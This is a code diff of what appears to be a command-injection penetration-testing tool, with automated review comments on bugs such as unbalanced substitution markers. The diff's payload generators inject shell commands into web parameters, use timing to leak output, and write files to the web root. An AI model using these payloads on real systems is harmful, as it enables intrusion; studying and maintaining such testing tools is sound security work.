@@ -509,38 +494,36 @@ def fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, htt "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print($(echo $(" + cmd + ")))\n\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + ")))\n\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c 
\"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print($(echo $(" + cmd + ")))\n\")" + separator + - "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + ")))\n\"" + settings.CMD_SUB_SUFFIX + separator + + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) 
@@ -548,9 +531,8 @@ def fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, htt elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print($(echo $(" + cmd + ")))\n\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + ")))\n\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: diff --git a/src/core/injections/controller/checks.py b/src/core/injections/controller/checks.py index 2a8ddf9d21..edebe80b42 100755 --- a/src/core/injections/controller/checks.py +++ b/src/core/injections/controller/checks.py @@ -1502,6 +1502,8 @@ def tamper_scripts(stored_tamper_scripts): if "hexencode" or "base64encode" == script: settings.MULTI_ENCODED_PAYLOAD.append(script) import_script = str(settings.TAMPER_SCRIPTS_PATH + script + ".py").replace("/",".").split(".py")[0] + if not stored_tamper_scripts: + settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1]) warn_msg = "" if settings.EVAL_BASED_STATE != False and script in settings.EVAL_NOT_SUPPORTED_TAMPER_SCRIPTS: warn_msg = "The dynamic code evaluation technique does " 
@@ -1509,13 +1511,15 @@ def tamper_scripts(stored_tamper_scripts): warn_msg = "Windows targets do " elif settings.TARGET_OS != settings.OS.WINDOWS and script in settings.UNIX_NOT_SUPPORTED_TAMPER_SCRIPTS: warn_msg = "Unix-like targets do " + elif "backticks" == script and menu.options.alter_shell: + warn_msg = "Option '--alter-shell' " if len(warn_msg) != 0: if not stored_tamper_scripts: warn_msg = warn_msg + "not support the usage of '" + script + ".py'. Skipping tamper script." settings.print_data_to_stdout(settings.print_warning_msg(warn_msg)) else: - if not stored_tamper_scripts: - settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1]) + # if not stored_tamper_scripts: + # settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1]) try: module = __import__(import_script, fromlist=[None]) if not hasattr(module, "__tamper__"): diff --git a/src/core/injections/controller/controller.py b/src/core/injections/controller/controller.py index 801b885cc3..f892e9b8bb 100644 --- a/src/core/injections/controller/controller.py +++ b/src/core/injections/controller/controller.py 
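Review bot: The new prefix `warn_msg = "Option '--alter-shell' "` is later concatenated with `"not support the usage of '" + script + ".py'..."`, producing "Option '--alter-shell' not support ..."; every sibling prefix ends in "do " or "does ", so this one should be `warn_msg = "Option '--alter-shell' does "`. The two lines that printed the script name in the `else` branch are commented out rather than deleted, even though the previous hunk already moved that print ahead of the support check; dead code in comments should go. Note the moved print means a skipped script is now listed before its "Skipping tamper script" warning is shown — if that ordering is deliberate, a short comment on the new print line would make it clear. tamper_scripts() starts before this hunk and continues past it.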
@@ -40,6 +40,26 @@ Checks if the testable parameter is exploitable. """ +""" +Heuristic basic checks payloads generator +""" +def basic_payload_generator(): + suffix = "" + if settings.USE_BACKTICKS: + prefix = "expr " + else: + prefix = "(" + suffix = ")" + settings.BASIC_STRING = prefix + settings.CALC_STRING + suffix + settings.BASIC_COMMAND_INJECTION_PAYLOADS = [";echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + + "%26echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + + "|echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + + settings.RANDOM_STRING_GENERATOR, + "|set /a " + settings.BASIC_STRING + "%26set /a " + settings.BASIC_STRING + ] +""" +Initializing basic level check status +""" def basic_level_checks(): settings.TIME_RELATIVE_ATTACK = False settings.SKIP_CODE_INJECTIONS = None @@ -134,13 +154,15 @@ def heuristic_request(url, http_request_method, check_parameter, payload, whites """ def command_injection_heuristic_basic(url, http_request_method, check_parameter, the_type, header_name, inject_http_headers): check_parameter = check_parameter.lstrip().rstrip() + checks.perform_payload_modification(payload="") + basic_payload_generator() if menu.options.alter_shell: basic_payloads = settings.ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS else: basic_payloads = settings.BASIC_COMMAND_INJECTION_PAYLOADS settings.CLASSIC_STATE = True try: - checks.perform_payload_modification(payload="") + # checks.perform_payload_modification(payload="") for whitespace in settings.WHITESPACES: if not settings.IDENTIFIED_COMMAND_INJECTION: _ = 0 
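Review bot: `basic_payload_generator()` rewrites two module-level globals, `settings.BASIC_STRING` and `settings.BASIC_COMMAND_INJECTION_PAYLOADS`, and reads `settings.USE_BACKTICKS`, but nothing in the function or its leading text says so; the triple-quoted string above the `def` is a bare expression (this file's existing convention, as the "Initializing basic level check status" text shows), so a docstring inside the function is where a reader will look. Suggested docstring: `"""Rebuild settings.BASIC_STRING and settings.BASIC_COMMAND_INJECTION_PAYLOADS for the current settings.USE_BACKTICKS value (presumably set while tamper scripts are applied); must run before the heuristic payloads are read."""`. The initial `suffix = ""` could also carry a why-comment, e.g. `# "expr" needs no closing token; the arithmetic form is parenthesised`.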
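Review bot: In command_injection_heuristic_basic the new call sequence `checks.perform_payload_modification(payload="")` then `basic_payload_generator()` is order-dependent — the generator reads `settings.USE_BACKTICKS`, which the tamper pass presumably sets — but the hunk leaves only a commented-out copy of the old call inside the `try` to hint at this; delete that comment and state the dependency instead: `# tamper scripts must be applied first: basic_payload_generator() reads settings.USE_BACKTICKS`. Only the non-alter-shell list is regenerated while the `menu.options.alter_shell` branch still reads the static `settings.ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS`; this matches the checks.py hunk that skips backticks.py under `--alter-shell`, but that is not obvious here, so a comment on the `if menu.options.alter_shell:` line would prevent someone from "fixing" it. Moving the call out of the `try` also means any exception it raises is no longer handled by that block's `except`, which may be intended but is unexplained.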
@@ -735,12 +757,6 @@ def do_check(url, http_request_method, filename): warn_msg += "time-based injections because of inherent high latency time." settings.print_data_to_stdout(settings.print_warning_msg(warn_msg)) - # Check for "backticks" tamper script. - if settings.USE_BACKTICKS == True: - if not menu.options.tech or "e" in menu.options.tech or "t" in menu.options.tech or "f" in menu.options.tech: - warn_msg = "Commands substitution using backtics is only supported by the (results-based) classic command injection technique. " - settings.print_data_to_stdout(settings.print_warning_msg(warn_msg)) - perform_checks(url, http_request_method, filename) # All injection techniques seems to be failed! diff --git a/src/core/injections/controller/handler.py b/src/core/injections/controller/handler.py index e199fa3a74..6d03cf211d 100755 --- a/src/core/injections/controller/handler.py +++ b/src/core/injections/controller/handler.py 
@@ -311,15 +311,15 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t if settings.TARGET_OS == settings.OS.WINDOWS: if alter_shell: - if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: - cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" - else: - cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" + # if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: + # cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" + # else: + cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: rand_num = randv1 + randv2 cmd = "powershell.exe -InputFormat none write (" + str(rand_num) + ")" else: - if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: + if technique == settings.INJECTION_TECHNIQUE.TIME_BASED or technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED: cmd = "expr " + str(randv1) + " %2B " + str(randv2) + "" else: cmd = "echo $((" + str(randv1) + " %2B " + str(randv2) + "))" diff --git a/src/core/injections/results_based/techniques/classic/cb_payloads.py b/src/core/injections/results_based/techniques/classic/cb_payloads.py index 0b8fbba36c..58bf283136 100755 --- a/src/core/injections/results_based/techniques/classic/cb_payloads.py +++ b/src/core/injections/results_based/techniques/classic/cb_payloads.py 
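Review bot: The widened condition reads better as a membership test, `if technique in (settings.INJECTION_TECHNIQUE.TIME_BASED, settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED):`, and it deserves a why-comment, since the `$((…))` form is kept only for the remaining technique — presumably `expr` is chosen because the backticks tamper can wrap a command but not an arithmetic expansion; if so, `# expr form: usable inside a command substitution, unlike $((…))` above the branch. The Windows alter-shell branch now always builds `settings.WIN_PYTHON_INTERPRETER + " -c …"`, dropping the `python.exe` suffix the time-based case used to append; if that is a deliberate fix rather than a side effect of the cleanup, state it in the commit message. do_time_relative_proccess continues outside the hunk.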
@@ -36,44 +36,22 @@ def decision(separator, TAG, randv1, randv2): "\"') do @set /p = " + TAG + "%i" + TAG + TAG + settings.CMD_NUL ) else: - if not settings.WAF_ENABLED: - if settings.USE_BACKTICKS: - math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`" - else: - math_calc = "$((" + str(randv1) + "%2B" + str(randv2) + "))" + if settings.USE_BACKTICKS or settings.WAF_ENABLED: + math_calc = settings.CMD_SUB_PREFIX + "expr " + str(randv1) + " %2B " + str(randv2) + settings.CMD_SUB_SUFFIX else: - if settings.USE_BACKTICKS: - math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`" - else: - math_calc = "$(expr " + str(randv1) + " %2B " + str(randv2) + ")" + math_calc = settings.CMD_SUB_PREFIX + "(" + str(randv1) + "%2B" + str(randv2) + "))" if settings.SKIP_CALC: - if settings.USE_BACKTICKS: - payload = (separator + - "echo " + TAG + - TAG + "" + TAG + "" + - separator - ) - else: - payload = (separator + - "echo " + TAG + - "$(echo " + TAG + ")" + TAG + "" + - separator - ) + payload = (separator + + "echo " + TAG + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + TAG + ) else: - if settings.USE_BACKTICKS: - payload = (separator + - "echo " + TAG + - math_calc + - TAG + "" + TAG + "" - ) - else: - payload = (separator + - "echo " + TAG + - math_calc + - "$(echo " + TAG + ")" + TAG + "" + - separator - ) + payload = (separator + + "echo " + TAG + + math_calc + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + TAG + ) return payload """ @@ -96,16 +74,14 @@ def decision_alter_shell(separator, TAG, randv1, randv2): payload = (separator + settings.LINUX_PYTHON_INTERPRETER + " -c \"print('" + TAG + TAG + - TAG + "')\"" + - separator + TAG + "')\"" ) else: payload = (separator + settings.LINUX_PYTHON_INTERPRETER + " -c \"print('" + TAG + "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + TAG + "'%2B'" + - TAG + "')\"" + - separator + TAG + "')\"" ) return payload 
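Review bot: In `decision`, the non-backticks branch opens with `settings.CMD_SUB_PREFIX` but closes with a literal `"))"`, so the arithmetic expansion is well-formed only if that prefix is exactly `$(`; the sibling branch and the rest of this patch close with `settings.CMD_SUB_SUFFIX`. Write it as `math_calc = settings.CMD_SUB_PREFIX + "(" + str(randv1) + "%2B" + str(randv2) + ")" + settings.CMD_SUB_SUFFIX` so the pair stays balanced whatever the prefix is. The trailing `separator` is also dropped from every payload in this and the following hunk; if that is deliberate, the docstrings above `decision` and `decision_alter_shell` should say the payload no longer terminates itself.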
@@ -126,25 +102,13 @@ def cmd_execution(separator, TAG, cmd): ) else: settings.USER_APPLIED_CMD = cmd - if settings.USE_BACKTICKS: - cmd_exec = "`" + cmd + "`" - payload = (separator + - "echo " + TAG + - "" + TAG + "" + - cmd_exec + - "" + TAG + "" + TAG + "" + - separator - ) - else: - cmd_exec = "$(" + cmd + ")" - payload = (separator + - "echo " + TAG + - "$(echo " + TAG + ")" + - cmd_exec + - "$(echo " + TAG + ")" + TAG + "" + - separator - ) - + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + payload = (separator + + "echo " + TAG + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + + cmd_exec + + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + TAG + ) return payload """ @@ -164,23 +128,14 @@ def cmd_execution_alter_shell(separator, TAG, cmd): TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" + "') do @set /p=%i " + settings.CMD_NUL ) - else: - - if settings.USE_BACKTICKS: - payload = (separator + - settings.LINUX_PYTHON_INTERPRETER + - " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'$(echo `" + cmd + ")`" + - TAG + "'%2B'" + TAG + "')\"" + - separator - ) - else: - payload = (separator + - settings.LINUX_PYTHON_INTERPRETER + - " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'$(echo $(" + cmd + "))'%2B'" + - TAG + "'%2B'" + TAG + "')\"" + - separator - ) + settings.USER_APPLIED_CMD = cmd + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + payload = (separator + + settings.LINUX_PYTHON_INTERPRETER + + " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'" + settings.CMD_SUB_PREFIX + "echo " + cmd_exec + settings.CMD_SUB_SUFFIX + "'%2B'" + + TAG + "'%2B'" + TAG + "')\"" + ) return payload # eof diff --git a/src/core/injections/semiblind/techniques/file_based/fb_payloads.py b/src/core/injections/semiblind/techniques/file_based/fb_payloads.py index 4699b32c30..cafa7d2664 100755 --- a/src/core/injections/semiblind/techniques/file_based/fb_payloads.py 
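Review bot: In `cmd_execution_alter_shell` the new Unix payload wraps `cmd_exec` — already `settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX` — in a second `settings.CMD_SUB_PREFIX + "echo " + … + settings.CMD_SUB_SUFFIX`. When the backticks tamper makes both markers a backtick, outer and inner substitution share one delimiter and the shell pairs them left to right: the first pair closes right after `echo `, the command text follows unwrapped, and an empty pair is left over, because backticks do not nest without backslash escaping — so the alter-shell path likely breaks exactly in the mode this commit adds. Either drop the outer wrapper, `"'%2B'" + cmd_exec + "'%2B'"`, or keep the outer layer as literal `$(` … `)`. The same nesting appears in fb_payloads.py `cmd_execution_alter_shell` (@@ -110) and in tfb_payloads.py `cmd_execution_alter_shell` (@@ -295, @@ -328), where the inner substitution is additionally closed with a literal `"))"`.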
+++ b/src/core/injections/semiblind/techniques/file_based/fb_payloads.py @@ -35,8 +35,7 @@ def decision(separator, TAG, OUTPUT_TEXTFILE): ) else: payload = (separator + - "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE + - separator + "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE ) return payload @@ -45,7 +44,6 @@ def decision(separator, TAG, OUTPUT_TEXTFILE): __Warning__: The alternative shells are still experimental. """ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE): - if settings.TARGET_OS == settings.OS.WINDOWS: python_payload = settings.WIN_PYTHON_INTERPRETER + " -c \"open('" + OUTPUT_TEXTFILE + "','w').write('" + TAG + "')\"" payload = (separator + @@ -55,7 +53,7 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE): ) else: payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\")" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX ) if settings.USER_AGENT_INJECTION == True or \ @@ -87,8 +85,7 @@ def cmd_execution(separator, cmd, OUTPUT_TEXTFILE): else: settings.USER_APPLIED_CMD = cmd payload = (separator + - cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE + - separator + cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE ) return payload 
@@ -110,7 +107,8 @@ def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE): ) else: payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX ) # New line fixation diff --git a/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py b/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py index 74343e6445..f8101c6335 100755 --- a/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py +++ b/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py @@ -37,8 +37,8 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method): "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.SINGLE_WHITESPACE + "'" + TAG + "'" + ampersand + 
@@ -51,30 +51,28 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method): else: if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + ")" + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + "if [ " + str(j) + " -ne ${str1} ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + - "str=$(echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + ")" + separator + - "str=$(cat " + OUTPUT_TEXTFILE + ")" + separator + - "str1=$(expr length \"$str\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "str=" + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str} " + separator + "[ " + str(j) + " -eq ${str1} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) 
@@ -83,11 +81,10 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method): pipe = "|" payload = (pipe + "echo " + TAG + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + pipe + - "[ " + str(j) + " -ne $(cat " + OUTPUT_TEXTFILE + + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + pipe + "tr -d '\\n'" + pipe + "wc -c) ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) else: pass 
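Review bot: The `||` payload opens the substitution with `settings.CMD_SUB_PREFIX` but still closes it with the literal `)` inside `"wc -c) ] "`, so the pair is balanced only when the prefix is `$(`; under the backticks tamper this commit is meant to support, the payload is left with an unmatched opener. Close it with the suffix: `pipe + "tr -d '\\n'" + pipe + "wc -c" + settings.CMD_SUB_SUFFIX + " ] " + separator +`. The same literal-`)` closers remain after a `CMD_SUB_PREFIX` opener in decision_alter_shell (@@ -107, @@ -150), cmd_execution (@@ -257), cmd_execution_alter_shell (@@ -295, @@ -328), get_char (@@ -400), get_char_alter_shell (@@ -426, @@ -465) and fp_result (@@ -533) of this file.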
@@ -107,42 +104,40 @@ def decision_alter_shell(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_reque "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.SINGLE_WHITESPACE + "'" + TAG + "'" + ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(j) + " -ne ${str1} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). 
- "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") " + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") " + separator + "[ " + str(j) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " ) separator = _urllib.parse.unquote(separator) 
